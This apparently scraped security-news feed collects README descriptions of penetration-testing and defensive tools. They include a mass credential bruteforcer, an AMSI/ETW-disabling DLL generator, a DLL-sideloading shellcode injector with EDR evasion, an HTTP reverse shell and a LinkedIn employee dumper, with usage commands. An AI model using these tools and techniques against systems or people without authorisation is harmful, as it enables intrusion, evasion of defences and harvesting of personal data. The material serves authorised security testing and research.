Ports : 21-1000
Threads : 10
Protocol : tcp
---------------------------------------------
Port Status Service VERSION
22 /tcp open ssh SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9

Contributing

Contributions are welcome! To contribute to NetworkSherlock, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact



Py-Amsi - Scan Strings Or Files For Malware Using The Windows Antimalware Scan Interface

By: Zion3R


py-amsi is a library that scans strings or files for malware using the Windows Antimalware Scan Interface (AMSI) API. AMSI is an interface native to Windows that allows applications to ask the antivirus installed on the system to analyse a file/string. AMSI is not tied to Windows Defender. Antivirus providers implement the AMSI interface to receive calls from applications. This library takes advantage of the API to make antivirus scans in python. Read more about the Windows AMSI API here.


Installation

  • Via pip

    pip install pyamsi
  • Clone repository

    git clone https://github.com/Tomiwa-Ot/py-amsi.git
    cd py-amsi/
    python setup.py install

Usage

dictionary of the format # { # 'Sample Size' : 68, // The string/file size in bytes # 'Risk Level' : 0, // The risk level as suggested by the antivirus # 'Message' : 'File is clean' // Response message # }" dir="auto">
from pyamsi import Amsi

# Scan a file
Amsi.scan_file(file_path, debug=True) # debug is optional and False by default

# Scan string
Amsi.scan_string(string, string_name, debug=False) # debug is optional and False by default

# Both functions return a dictionary of the format
# {
# 'Sample Size' : 68, // The string/file size in bytes
# 'Risk Level' : 0, // The risk level as suggested by the antivirus
# 'Message' : 'File is clean' // Response message
# }
Risk Level Meaning
0 AMSI_RESULT_CLEAN (File is clean)
1 AMSI_RESULT_NOT_DETECTED (No threat detected)
16384 AMSI_RESULT_BLOCKED_BY_ADMIN_START (Threat is blocked by the administrator)
20479 AMSI_RESULT_BLOCKED_BY_ADMIN_END (Threat is blocked by the administrator)
32768 AMSI_RESULT_DETECTED (File is considered malware)

Docs

https://tomiwa-ot.github.io/py-amsi/index.html



Mass-Bruter - Mass Bruteforce Network Protocols

By: Zion3R


Mass bruteforce network protocols

Info

Simple personal script to quickly mass bruteforce common services in a large scale of network.
It will check for default credentials on ftp, ssh, mysql, mssql...etc.
This was made for authorized red team penetration testing purpose only.


How it works

  1. Use masscan(faster than nmap) to find alive hosts with common ports from network segment.
  2. Parse ips and ports from masscan result.
  3. Craft and run hydra commands to automatically bruteforce supported network services on devices.

Requirements

  • Kali linux or any preferred linux distribution
  • Python 3.10+
# Clone the repo
git clone https://github.com/opabravo/mass-bruter
cd mass-bruter

# Install required tools for the script
apt update && apt install seclists masscan hydra

How To Use

Private ip range : 10.0.0.0/8, 192.168.0.0/16, 172.16.0.0/12

Save masscan results under ./result/masscan/, with the format masscan_<name>.<ext>

Ex: masscan_192.168.0.0-16.txt

Example command:

masscan -p 3306,1433,21,22,23,445,3389,5900,6379,27017,5432,5984,11211,9200,1521 172.16.0.0/12 | tee ./result/masscan/masscan_test.txt

Example Resume Command:

masscan --resume paused.conf | tee -a ./result/masscan/masscan_test.txt

Command Options

Bruteforce Script Options: -q, --quick Quick mode (Only brute telnet, ssh, ftp , mysql, mssql, postgres, oracle) -a, --all Brute all services(Very Slow) -s, --show Show result with successful login -f, --file-path PATH The directory or file that contains masscan result [default: ./result/masscan/] --help Show this message and exit." dir="auto">
โ”Œโ”€โ”€(rootใ‰ฟroot)-[~/mass-bruter]
โ””โ”€# python3 mass_bruteforce.py
Usage: [OPTIONS]

Mass Bruteforce Script

Options:
-q, --quick Quick mode (Only brute telnet, ssh, ftp , mysql,
mssql, postgres, oracle)
-a, --all Brute all services(Very Slow)
-s, --show Show result with successful login
-f, --file-path PATH The directory or file that contains masscan result
[default: ./result/masscan/]
--help Show this message and exit.

Quick Bruteforce Example:

python3 mass_bruteforce.py -q -f ~/masscan_script.txt

Fetch cracked credentials:

python3 mass_bruteforce.py -s

Todo

  • Migrate with dpl4hydra
  • Optimize the code and functions
  • MultiProcessing

Any contributions are welcomed!



LightsOut - Generate An Obfuscated DLL That Will Disable AMSI And ETW

By: Zion3R


LightsOut will generate an obfuscated DLL that will disable AMSI & ETW while trying to evade AV. This is done by randomizing all WinAPI functions used, xor encoding strings, and utilizing basic sandbox checks. Mingw-w64 is used to compile the obfuscated C code into a DLL that can be loaded into any process where AMSI or ETW are present (i.e. PowerShell).

LightsOut is designed to work on Linux systems with python3 and mingw-w64 installed. No other dependencies are required.


Features currently include:

  • XOR encoding for strings
  • WinAPI function name randomization
  • Multiple sandbox check options
  • Hardware breakpoint bypass option
 _______________________
| |
| AMSI + ETW |
| |
| LIGHTS OUT |
| _______ |
| || || |
| ||_____|| |
| |/ /|| |
| / / || |
| /____/ /-' |
| |____|/ |
| |
| @icyguider |
| |
| RG|
`-----------------------'
usage: lightsout.py [-h] [-m <method>] [-s <option>] [-sa <value>] [-k <key>] [-o <outfile>] [-p <pid>]

Generate an obfuscated DLL that will disable AMSI & ETW

options:
-h, --help show this help message and exit
-m <method>, --method <method>
Bypass technique (Options: patch, hwbp, remote_patch) (Default: patch)
-s <option>, --sandbox &lt ;option>
Sandbox evasion technique (Options: mathsleep, username, hostname, domain) (Default: mathsleep)
-sa <value>, --sandbox-arg <value>
Argument for sandbox evasion technique (Ex: WIN10CO-DESKTOP, testlab.local)
-k <key>, --key <key>
Key to encode strings with (randomly generated by default)
-o <outfile>, --outfile <outfile>
File to save DLL to

Remote options:
-p <pid>, --pid <pid>
PID of remote process to patch

Intended Use/Opsec Considerations

This tool was designed to be used on pentests, primarily to execute malicious powershell scripts without getting blocked by AV/EDR. Because of this, the tool is very barebones and a lot can be added to improve opsec. Do not expect this tool to completely evade detection by EDR.

Usage Examples

You can transfer the output DLL to your target system and load it into powershell various ways. For example, it can be done via P/Invoke with LoadLibrary:

Or even easier, copy powershell to an arbitrary location and side load the DLL!

Greetz/Credit/Further Reference:



HBSQLI - Automated Tool For Testing Header Based Blind SQL Injection

By: Zion3R


HBSQLI is an automated command-line tool for performing Header Based Blind SQL injection attacks on web applications. It automates the process of detecting Header Based Blind SQL injection vulnerabilities, making it easier for security researchers , penetration testers & bug bounty hunters to test the security of web applications.ย 


Disclaimer:

This tool is intended for authorized penetration testing and security assessment purposes only. Any unauthorized or malicious use of this tool is strictly prohibited and may result in legal action.

The authors and contributors of this tool do not take any responsibility for any damage, legal issues, or other consequences caused by the misuse of this tool. The use of this tool is solely at the user's own risk.

Users are responsible for complying with all applicable laws and regulations regarding the use of this tool, including but not limited to, obtaining all necessary permissions and consents before conducting any testing or assessment.

By using this tool, users acknowledge and accept these terms and conditions and agree to use this tool in accordance with all applicable laws and regulations.

Installation

Install HBSQLI with following steps:

$ git clone https://github.com/SAPT01/HBSQLI.git
$ cd HBSQLI
$ pip3 install -r requirements.txt

Usage/Examples

usage: hbsqli.py [-h] [-l LIST] [-u URL] -p PAYLOADS -H HEADERS [-v]

options:
-h, --help show this help message and exit
-l LIST, --list LIST To provide list of urls as an input
-u URL, --url URL To provide single url as an input
-p PAYLOADS, --payloads PAYLOADS
To provide payload file having Blind SQL Payloads with delay of 30 sec
-H HEADERS, --headers HEADERS
To provide header file having HTTP Headers which are to be injected
-v, --verbose Run on verbose mode

For Single URL:

$ python3 hbsqli.py -u "https://target.com" -p payloads.txt -H headers.txt -v

For List of URLs:

$ python3 hbsqli.py -l urls.txt -p payloads.txt -H headers.txt -v

Modes

There are basically two modes in this, verbose which will show you all the process which is happening and show your the status of each test done and non-verbose, which will just print the vulnerable ones on the screen. To initiate the verbose mode just add -v in your command

Notes

  • You can use the provided payload file or use a custom payload file, just remember that delay in each payload in the payload file should be set to 30 seconds.

  • You can use the provided headers file or even some more custom header in that file itself according to your need.

Demo



KnockKnock - Enumerate Valid Users Within Microsoft Teams And OneDrive With Clean Output

By: Zion3R


Designed to validate potential usernames by querying OneDrive and/or Microsoft Teams, which are passive methods.
Additionally, it can output/create a list of legacy Skype users identified through Microsoft Teams enumeration.
Finally, it also creates a nice clean list for future usage, all conducted from a single tool.


Usage

$ python3 .\KnockKnock.py -h

_ __ _ _ __ _
| |/ /_ __ ___ ___| | _| |/ /_ __ ___ ___| | __
| ' /| '_ \ / _ \ / __| |/ / ' /| '_ \ / _ \ / __| |/ /
| . \| | | | (_) | (__| <| . \| | | | (_) | (__| <
|_|\_\_| |_|\___/ \___|_|\_\_|\_\_| |_|\___/ \___|_|\_\
v0.9 Author: @waffl3ss


usage: KnockKnock.py [-h] [-teams] [-onedrive] [-l] -i INPUTLIST [-o OUTPUTFILE] -d TARGETDOMAIN [-t TEAMSTOKEN] [-threads MAXTHREADS] [-v]

options:
-h, --help show this help message and exit
-teams Run the Teams User Enumeration Module
-onedrive Run the One Drive Enumeration Module
-l Write legacy skype users to a seperate file
-i INPUTLIST Input file with newline-seperated users to check
-o OUTPUTFILE Write output to file
-d TARGETDOMAIN Domain to target
-t TEAMSTOKEN Teams Token (file containing token or a string)
-threads MAXTHREADS Number of threads to use in the Teams User Enumeration (default = 10)
-v Show verbose errors

Examples

./KnockKnock.py -teams -i UsersList.txt -d Example.com -o OutFile.txt -t BearerToken.txt
./KnockKnock.py -onedrive -i UsersList.txt -d Example.com -o OutFile.txt
./KnockKnock.py -onedrive -teams -i UsersList.txt -d Example.com -t BearerToken.txt -l

Options

  • You can select one or both modes, as long as the appropriate options are provided for the modules selected.
  • Both modules will require the domain flag (-d) and the user input list (-i).
  • The tool does not require an output file as an option, and if not supplied, it will print to screen only.
  • The verbose mode will show A LOT of extra information, including users that are not valid.
  • The Teams option requires a bearer token. The script automatically removes the beginning and end portions to use only whats required.

How to get your Bearer token

To get your bearer token, you will need a Cookie Manager plugin on your browser and login to your own Microsoft Teams through the browser.
Next, view the cookies related to the current webpage (teams.microsoft.com).
The cookie you are looking for is for the domain .teams.microsoft.com and is titled "authtoken".
You can copy the whole token as the script will split out the required part for you.


References

@nyxgeek - onedrive_user_enum
@immunIT - TeamsUserEnum



ADCSKiller - An ADCS Exploitation Automation Tool Weaponizing Certipy And Coercer

By: Zion3R

ADCSKiller is a Python-based tool designed to automate the process of discovering and exploiting Active Directory Certificate Services (ADCS) vulnerabilities. It leverages features of Certipy and Coercer to simplify the process of attacking ADCS infrastructure. Please note that the ADCSKiller is currently in its first drafts and will undergo further refinements and additions in future updates for sure.


Features

  • Enumerate Domain Administrators via LDAP
  • Enumerate Domaincontrollers via LDAP
  • Enumerate Certificate Authorities via Certipy
  • Exploitation of ESC1
  • Exploitation of ESC8

Installation

Since this tool relies on Certipy and Coercer, both tools have to be installed first.

git clone https://github.com/ly4k/Certipy && cd Certipy && python3 setup.py install
git clone https://github.com/p0dalirius/Coercer && cd Coercer && pip install -r requirements.txt && python3 setup.py install
git clone https://github.com/grimlockx/ADCSKiller/ && cd ADCSKiller && pip install -r requirements.txt

Usage

Usage: adcskiller.py [-h] -d DOMAIN -u USERNAME -p PASSWORD -t TARGET -l LEVEL -L LHOST

Options:
-h, --help Show this help message and exit.
-d DOMAIN, --domain DOMAIN
Target domain name. Use FQDN
-u USERNAME, --username USERNAME
Username.
-p PASSWORD, --password PASSWORD
Password.
-dc-ip TARGET, --target TARGET
IP Address of the domain controller.
-L LHOST, --lhost LHOST
FQDN of the listener machine - An ADIDNS is probably required

Todos

  • Tests, Tests, Tests
  • Enumerate principals which are allowed to dcsync
  • Use dirkjanm's gettgtpkinit.py to receive a ticket instead of Certipy auth
  • Support DC Certificate Authorities
  • ESC2 - ESC7
  • ESC9 - ESC11?
  • Automated add an ADIDNS entry if required
  • Support DCSync functionality

Credits



HTTP-Shell - MultiPlatform HTTP Reverse Shell

By: Zion3R


HTTP-Shell is Multiplatform Reverse Shell. This tool helps you to obtain a shell-like interface on a reverse connection over HTTP. Unlike other reverse shells, the main goal of the tool is to use it in conjunction with Microsoft Dev Tunnels, in order to get a connection as close as possible to a legitimate one.

This shell is not fully interactive, but displays any errors on screen (both Windows and Linux), is capable of uploading and downloading files, has command history, terminal cleanup (even with CTRL+L), automatic reconnection and movement between directories.


Requirements

  • Python 3 for Server
  • Install requirements.txt
  • Bash for Linux Client
  • PowerShell 4.0 or greater for Windows Client

Download

It is recommended to clone the complete repository or download the zip file. You can do this by running the following command:

git clone https://github.com/JoelGMSec/HTTP-Shell

Usage

The detailed guide of use can be found at the following link:

https://darkbyte.net/obteniendo-shells-con-microsoft-dev-tunnels

License

This project is licensed under the GNU 3.0 license - see the LICENSE file for more details.

Credits and Acknowledgments

This tool has been created and designed from scratch by Joel Gรกmez Molina (@JoelGMSec).

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can find me on Twitter as @JoelGMSec and on my blog darkbyte.net.



PurpleOps - An Open-Source Self-Hosted Purple Team Management Web Application

By: Zion3R


An open-source self-hosted purple team management web application.


Key Features

  • Template engagements and testcases
  • Framework friendly
  • Role-based Access Control & MFA
  • Inbuilt DOCX reporting + custom template support

How PurpleOps is different:

  • No attribution needed
  • Hackable, no "no-reversing" clauses
  • No over complications with tomcat, redis, manual database transplanting and an obtuce permission model

Installation

mongodb -d -p 27017:27017 mongo $ pip3 install -r requirements.txt $ python3 seeder.py $ python3 purpleops.py" dir="auto">
# Clone this repository
$ git clone https://github.com/CyberCX-STA/PurpleOps

# Go into the repository
$ cd PurpleOps

# Alter PurpleOps settings (if you want to customize anything but should work out the box)
$ nano .env

# Run the app with docker
$ sudo docker compose up

# PurpleOps should now by available on http://localhost:5000, it is recommended to add a reverse proxy such as nginx or Apache in front of it if you want to expose this to the outside world.

# Alternatively
$ sudo docker run --name mongodb -d -p 27017:27017 mongo
$ pip3 install -r requirements.txt
$ python3 seeder.py
$ python3 purpleops.py

Contact Us

We would love to hear back from you, if something is broken or have and idea to make it better add a ticket or ping us pops@purpleops.app | @_w_m__

Credits



DNSWatch - DNS Traffic Sniffer and Analyzer

By: Zion3R


DNSWatch is a Python-based tool that allows you to sniff and analyze DNS (Domain Name System) traffic on your network. It listens to DNS requests and responses and provides insights into the DNS activity.ย 

Features

  • Sniff and analyze DNS requests and responses.
  • Display DNS requests with their corresponding source and destination IP addresses.
  • Optional verbose mode for detailed packet inspection.
  • Save the results to a specified output file.
  • Filter DNS traffic by specifying a target IP address.
  • Save DNS requests in a database for further analysis(optional)
  • Analyze DNS types (optional).
  • Support for DNS over HTTPS (DoH) (optional).

Requirements

  • Python 3.7+
  • scapy 2.4.5 or higher
  • colorama 0.4.4 or higher

Installation

  1. Clone this repository:
git clone https://github.com/HalilDeniz/DNSWatch.git
  1. Install the required dependencies:
pip install -r requirements.txt

Usage

python dnswatch.py -i <interface> [-v] [-o <output_file>] [-k <target_ip>] [--analyze-dns-types] [--doh]
  • -i, --interface: Specify the network interface (e.g., eth0).
  • -v, --verbose: Use this flag for more verbose output.
  • -o, --output: Specify the filename to save results.
  • -t, --target-ip: Specify a specific target IP address to monitor.
  • -adt, --analyze-dns-types: Analyze DNS types.
  • --doh: Use DNS over HTTPS (DoH) for resolving DNS requests.
  • -fd, --target-domains: Filter DNS requests by specified domains.
  • -d, --database: Enable database storage for DNS requests.

Press Ctrl+C to stop the sniffing process.

Examples

  • Sniff DNS traffic on interface "eth0":
python dnswatch.py -i eth0
  • Sniff DNS traffic on interface "eth0" and save the results to a file:
python dnswatch.py -i eth0 -o dns_results.txt
  • Sniff DNS traffic on interface "eth0" and filter requests/responses involving a specific target IP:
python dnswatch.py -i eth0 -k 192.168.1.100
  • Sniff DNS traffic on interface "eth0" and enable DNS type analysis:
python dnswatch.py -i eth0 --analyze-dns-types
  • Sniff DNS traffic on interface "eth0" using DNS over HTTPS (DoH):
python dnswatch.py -i eth0 --doh
  • Sniff DNS traffic on interface "wlan0" and Enable database storage
python3 dnswatch.py -i wlan0 --database

License

DNSWatch is licensed under the MIT License. See the LICENSE file for details.

Disclaimer

This tool is intended for educational and testing purposes only. It should not be used for any malicious activities.

Contact



Chimera - Automated DLL Sideloading Tool With EDR Evasion Capabilities

By: Zion3R


While DLL sideloading can be used for legitimate purposes, such as loading necessary libraries for a program to function, it can also be used for malicious purposes. Attackers can use DLL sideloading to execute arbitrary code on a target system, often by exploiting vulnerabilities in legitimate applications that are used to load DLLs.

To automate the DLL sideloading process and make it more effective, Chimera was created a tool that include evasion methodologies to bypass EDR/AV products. These tool can automatically encrypt a shellcode via XOR with a random key and create template Images that can be imported into Visual Studio to create a malicious DLL.

Also Dynamic Syscalls from SysWhispers2 is used and a modified assembly version to evade the pattern that the EDR search for, Random nop sleds are added and also registers are moved. Furthermore Early Bird Injection is also used to inject the shellcode in another process which the user can specify with Sandbox Evasion mechanisms like HardDisk check & if the process is being debugged. Finally Timing attack is placed in the loader which using waitable timers to delay the execution of the shellcode.

This tool has been tested and shown to be effective at bypassing EDR/AV products and executing arbitrary code on a target system.


Tool Usage

Chimera is written in python3 and there is no need to install any extra dependencies.

Chimera currently supports two DLL options either Microsoft teams or Microsoft OneDrive.

Someone can create userenv.dll which is a missing DLL from Microsoft Teams and insert it to the specific folder to

โ %USERPROFILE%/Appdata/local/Microsoft/Teams/current

For Microsoft OneDrive the script uses version DLL which is common because its missing from the binary example onedriveupdater.exe

Chimera Usage.

python3 ./chimera.py met.bin chimera_automation notepad.exe teams

python3 ./chimera.py met.bin chimera_automation notepad.exe onedrive

Additional Options

  • [raw payload file] : Path to file containing shellcode
  • [output path] : Path to output the C template file
  • [process name] : Name of process to inject shellcode into
  • [dll_exports] : Specify which DLL Exports you want to use either teams or onedrive
  • [replace shellcode variable name] : [Optional] Replace shellcode variable name with a unique name
  • [replace xor encryption name] : [Optional] Replace xor encryption name with a unique name
  • [replace key variable name] : [Optional] Replace key variable name with a unique name
  • [replace sleep time via waitable timers] : [Optional] Replace sleep time your own sleep time

Usefull Note

Once the compilation process is complete, a DLL will be generated, which should include either "version.dll" for OneDrive or "userenv.dll" for Microsoft Teams. Next, it is necessary to rename the original DLLs.

For instance, the original "userenv.dll" should be renamed as "tmpB0F7.dll," while the original "version.dll" should be renamed as "tmp44BC.dll." Additionally, you have the option to modify the name of the proxy DLL as desired by altering the source code of the DLL exports instead of using the default script names.

Visual Studio Project Setup

Step 1: Creating a New Visual Studio Project with DLL Template

  1. Launch Visual Studio and click on "Create a new project" or go to "File" -> "New" -> "Project."
  2. In the project templates window, select "Visual C++" from the left-hand side.
  3. Choose "Empty Project" from the available templates.
  4. Provide a suitable name and location for the project, then click "OK."
  5. On the project properties window, navigate to "Configuration Properties" -> "General" and set the "Configuration Type" to "Dynamic Library (.dll)."
  6. Configure other project settings as desired and save the project.ย 

ย 

Step 2: Importing Images into the Visual Studio Project

  1. Locate the "chimera_automation" folder containing the necessary Images.
  2. Open the folder and identify the following Images: main.c, syscalls.c, syscallsstubs.std.x64.asm.
  3. In Visual Studio, right-click on the project in the "Solution Explorer" panel and select "Add" -> "Existing Item."
  4. Browse to the location of each file (main.c, syscalls.c, syscallsstubs.std.x64.asm) and select them one by one. Click "Add" to import them into the project.
  5. Create a folder named "header_Images" within the project directory if it doesn't exist already.
  6. Locate the "syscalls.h" header file in the "header_Images" folder of the "chimera_automation" directory.
  7. Right-click on the "header_Images" folder in Visual Studio's "Solution Explorer" panel and select "Add" -> "Existing Item."
  8. Browse to the location of "syscalls.h" and select it. Click "Add" to import it into the project.

Step 3: Build Customization

  1. In the project properties window, navigate to "Configuration Properties" -> "Build Customizations."
  2. Click the "Build Customizations" button to open the build customization dialog.

Step 4: Enable MASM

  1. In the build customization dialog, check the box next to "masm" to enable it.
  2. Click "OK" to close the build customization dialog.

ย 

Step 5:

  1. Right click in the assembly file โ†’ properties and choose the following
  2. Exclude from build โ†’ No
  3. Content โ†’ Yes
  4. Item type โ†’ Microsoft Macro Assembler


Final Project Setup


Compiler Optimizations

Step 1: Change optimization

  1. In Visual Studio choose Project โ†’ properties
  2. C/C++ Optimization and change to the following

ย 

Step 2: Remove Debug Information's

  1. In Visual Studio choose Project โ†’ properties
  2. Linker โ†’ Debugging โ†’ Generate Debug Info โ†’ No


Liability Disclaimer:

To the maximum extent permitted by applicable law, myself(George Sotiriadis) and/or affiliates who have submitted content to my repo, shall not be liable for any indirect, incidental, special, consequential or punitive damages, or any loss of profits or revenue, whether incurred directly or indirectly, or any loss of data, use, goodwill, or other intangible losses, resulting from (i) your access to this resource and/or inability to access this resource; (ii) any conduct or content of any third party referenced by this resource, including without limitation, any defamatory, offensive or illegal conduct or other users or third parties; (iii) any content obtained from this resource

References

https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection

https://evasions.checkpoint.com/

https://github.com/Flangvik/SharpDllProxy

https://github.com/jthuraisamy/SysWhispers2

https://systemweakness.com/on-disk-detection-bypass-avs-edr-s-using-syscalls-with-legacy-instruction-series-of-instructions-5c1f31d1af7d

https://github.com/Mr-Un1k0d3r



Golddigger - Search Files For Gold

By: Zion3R


Gold Digger is a simple tool used to help quickly discover sensitive information in files recursively. Originally written to assist in rapidly searching files obtained during a penetration test.


Installation

Gold Digger requires Python3.

virtualenv -p python3 .
source bin/activate
python dig.py --help

Usage

Directory to search for gold -r RECURSIVE, --recursive RECURSIVE Search directory recursively? -l LOG, --log LOG Log file to save output" dir="auto">
usage: dig.py [-h] [-e EXCLUDE] [-g GOLD] -d DIRECTORY [-r RECURSIVE] [-l LOG]

optional arguments:
-h, --help show this help message and exit
-e EXCLUDE, --exclude EXCLUDE
JSON file containing extension exclusions
-g GOLD, --gold GOLD JSON file containing the gold to search for
-d DIRECTORY, --directory DIRECTORY
Directory to search for gold
-r RECURSIVE, --recursive RECURSIVE
Search directory recursively?
-l LOG, --log LOG Log file to save output

Example Usage

Gold Digger will recursively go through all folders and files in search of content matching items listed in the gold.json file. Additionally, you can leverage an exclusion file called exclusions.json for skipping files matching specific extensions. Provide the root folder as the --directory flag.

An example structure could be:

~/Engagements/CustomerName/data/randomfiles/
~/Engagements/CustomerName/data/randomfiles2/
~/Engagements/CustomerName/data/code/

You would provide the following command to parse all 3 account reports:

python dig.py --gold gold.json --exclude exclusions.json --directory ~/Engagements/CustomerName/data/ --log Customer_2022-123_gold.log

Results

The tool will create a log file containg the scanning results. Due to the nature of using regular expressions, there may be numerous false positives. Despite this, the tool has been proven to increase productivity when processing thousands of files.

Shout-outs

Shout out to @d1vious for releasing git-wild-hunt https://github.com/d1vious/git-wild-hunt! Most of the regex in GoldDigger was used from this amazing project.



LSMS - Linux Security And Monitoring Scripts

By: Zion3R

These are a collection of security and monitoring scripts you can use to monitor your Linux installation for security-related events or for an investigation. Each script works on its own and is independent of other scripts. The scripts can be set up to either print out their results, send them to you via mail, or using AlertR as notification channel.


Repository Structure

The scripts are located in the directory scripts/. Each script contains a short summary in the header of the file with a description of what it is supposed to do, (if needed) dependencies that have to be installed and (if available) references to where the idea for this script stems from.

Each script has a configuration file in the scripts/config/ directory to configure it. If the configuration file was not found during the execution of the script, the script will fall back to default settings and print out the results. Hence, it is not necessary to provide a configuration file.

The scripts/lib/ directory contains code that is shared between different scripts.

Scripts using a monitor_ prefix hold a state and are only useful for monitoring purposes. A single usage of them for an investigation will only result in showing the current state the Linux system and not changes that might be relevant for the system's security. If you want to establish the current state of your system as benign for these scripts, you can provide the --init argument.

Usage

Take a look at the header of the script you want to execute. It contains a short description what this script is supposed to do and what requirements are needed (if any needed at all). If requirements are needed, install them before running the script.

The shared configuration file scripts/config/config.py contains settings that are used by all scripts. Furthermore, each script can be configured by using the corresponding configuration file in the scripts/config/ directory. If no configuration file was found, a default setting is used and the results are printed out.

Finally, you can run all configured scripts by executing start_search.py (which is located in the main directory) or by executing each script manually. A Python3 interpreter is needed to run the scripts.

Monitoring

If you want to use the scripts to monitor your Linux system constantly, you have to perform the following steps:

  1. Set up a notification channel that is supported by the scripts (currently printing out, mail, or AlertR).

  2. Configure the scripts that you want to run using the configuration files in the scripts/config/ directory.

  3. Execute start_search.py with the --init argument to initialize the scripts with the monitor_ prefix and let them establish a state of your system. However, this assumes that your system is currently uncompromised. If you are unsure of this, you should verify its current state.

  4. Set up a cron job as root user that executes start_search.py (e.g., 0 * * * * root /opt/LSMS/start_search.py to start the search hourly).

List of Scripts

Name Script
Monitoring cron files monitor_cron.py
Monitoring /etc/hosts file monitor_hosts_file.py
Monitoring /etc/ld.so.preload file monitor_ld_preload.py
Monitoring /etc/passwd file monitor_passwd.py
Monitoring modules monitor_modules.py
Monitoring SSH authorized_keys files monitor_ssh_authorized_keys.py
Monitoring systemd unit files monitor_systemd_units.py
Search executables in /dev/shm search_dev_shm.py
Search fileless programs (memfd_create) search_memfd_create.py
Search hidden ELF files search_hidden_exe.py
Search immutable files search_immutable_files.py
Search kernel thread impersonations search_non_kthreads.py
Search processes that were started by a now disconnected SSH session search_ssh_leftover_processes.py
Search running deleted programs search_deleted_exe.py
Test script to check if alerting works test_alert.py
Verify integrity of installed .deb packages verify_deb_packages.py


LinkedInDumper - Tool To Dump Company Employees From LinkedIn API

By: Zion3R

Python 3 script to dump company employees from LinkedIn API๏’ฌ

Description

LinkedInDumper is a Python 3 script that dumps employee data from the LinkedIn social networking platform.

The results contain firstname, lastname, position (title), location and a user's profile link. Only 2 API calls are required to retrieve all employees if the company does not have more than 10 employees. Otherwise, we have to paginate through the API results. With the --email-format CLI flag one can define a Python string format to auto generate email addresses based on the retrieved first and last name.


Requirements

LinkedInDumper talks with the unofficial LinkedIn Voyager API, which requires authentication. Therefore, you must have a valid LinkedIn user account. To keep it simple, LinkedInDumper just expects a cookie value provided by you. Doing it this way, even 2FA protected accounts are supported. Furthermore, you are tasked to provide a LinkedIn company URL to dump employees from.

Retrieving LinkedIn Cookie

  1. Sign into www.linkedin.com and retrieve your li_at session cookie value e.g. via developer tools
  2. Specify the cookie value either persistently in the python script's variable li_at or temporarily during runtime via the CLI flag --cookie

Retrieving LinkedIn Company URL

  1. Search your target company on Google Search or directly on LinkedIn
  2. The LinkedIn company URL should look something like this: https://www.linkedin.com/company/apple

Usage

usage: linkedindumper.py [-h] --url <linkedin-url> [--cookie <cookie>] [--quiet] [--include-private-profiles] [--email-format EMAIL_FORMAT]

options:
-h, --help show this help message and exit
--url <linkedin-url> A LinkedIn company url - https://www.linkedin.com/company/<company>
--cookie <cookie> LinkedIn 'li_at' session cookie
--quiet Show employee results only
--include-private-profiles
Show private accounts too
--email-format Python string format for emails; for example:
[1] john.doe@example.com > '{0}.{1}@example.com'
[2] j.doe@example.com > '{0[0]}.{1}@example.com'
[3] jdoe@example.com > '{0[0]}{1}@example.com'
[4] doe@example.com > '{1}@example.com'
[5] john@example.com > '{0}@example.com'
[6] jd@example.com > '{0[0]}{1[0]}@example.com'

Example 1 - Docker Run

docker run --rm l4rm4nd/linkedindumper:latest --url 'https://www.linkedin.com/company/apple' --cookie <cookie> --email-format '{0}.{1}@apple.de'

Example 2 - Native Python

# install dependencies
pip install -r requirements.txt

python3 linkedindumper.py --url 'https://www.linkedin.com/company/apple' --cookie <cookie> --email-format '{0}.{1}@apple.de'

Outputs

The script will return employee data as semi-colon separated values (like CSV):

 โ–ˆโ–ˆโ–“     โ–ˆโ–ˆโ–“ โ–ˆโ–ˆโ–ˆโ–„    โ–ˆ  โ–ˆโ–ˆ โ–„โ–ˆโ–€โ–“โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ โ–“โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–„  โ–ˆโ–ˆโ–“ โ–ˆโ–ˆโ–ˆโ–„    โ–ˆ โ–“โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆโ–„  โ–ˆ    โ–ˆโ–ˆ  โ–ˆโ–ˆโ–ˆโ–„ โ–„โ–ˆโ–ˆโ–ˆโ–“ โ–ˆโ–ˆโ–“โ–ˆโ–ˆโ–ˆ  โ–“โ–ˆโ–ˆโ–ˆโ–ˆโ–ˆ  โ–ˆโ–ˆโ–€โ–ˆโ–ˆโ–ˆ  
โ–“โ–ˆโ–ˆโ–’ โ–“โ–ˆโ–ˆโ–’ โ–ˆโ–ˆ โ–€โ–ˆ โ–ˆ โ–ˆโ–ˆโ–„โ–ˆโ–’ โ–“โ–ˆ โ–€ โ–’โ–ˆโ–ˆโ–€ โ–ˆโ–ˆโ–Œโ–“โ–ˆโ–ˆโ–’ โ–ˆโ–ˆ โ–€โ–ˆ โ–ˆ โ–’โ–ˆโ–ˆโ–€ โ–ˆโ–ˆโ–Œ โ–ˆโ–ˆ โ–“โ–ˆโ–ˆโ–’โ–“โ–ˆโ–ˆโ–’โ–€โ–ˆ& #9600; โ–ˆโ–ˆโ–’โ–“โ–ˆโ–ˆโ–‘ โ–ˆโ–ˆโ–’โ–“โ–ˆ โ–€ โ–“โ–ˆโ–ˆ โ–’ โ–ˆโ–ˆโ–’
โ–’โ–ˆโ–ˆโ–‘ โ–’โ–ˆโ–ˆโ–’โ–“โ–ˆโ–ˆ โ–€โ–ˆ โ–ˆโ–ˆโ–’โ–“โ–ˆโ–ˆโ–ˆโ–„โ–‘ โ–’โ–ˆโ–ˆโ–ˆ โ–‘โ–ˆโ–ˆ โ–ˆโ–Œโ–’โ–ˆโ–ˆโ–’โ–“โ–ˆโ–ˆ โ–€โ–ˆ โ–ˆโ–ˆโ–’โ–‘โ–ˆโ–ˆ โ–ˆโ–Œโ–“โ–ˆโ–ˆ โ–’โ–ˆโ–ˆโ–‘โ–“โ–ˆโ–ˆ โ–“โ–ˆโ–ˆโ–‘โ–“โ–ˆโ–ˆโ–‘ โ–ˆโ–ˆโ–“โ–’โ–’โ–ˆโ–ˆโ–ˆ โ–“โ–ˆโ–ˆ โ–‘โ–„โ–ˆ โ–’
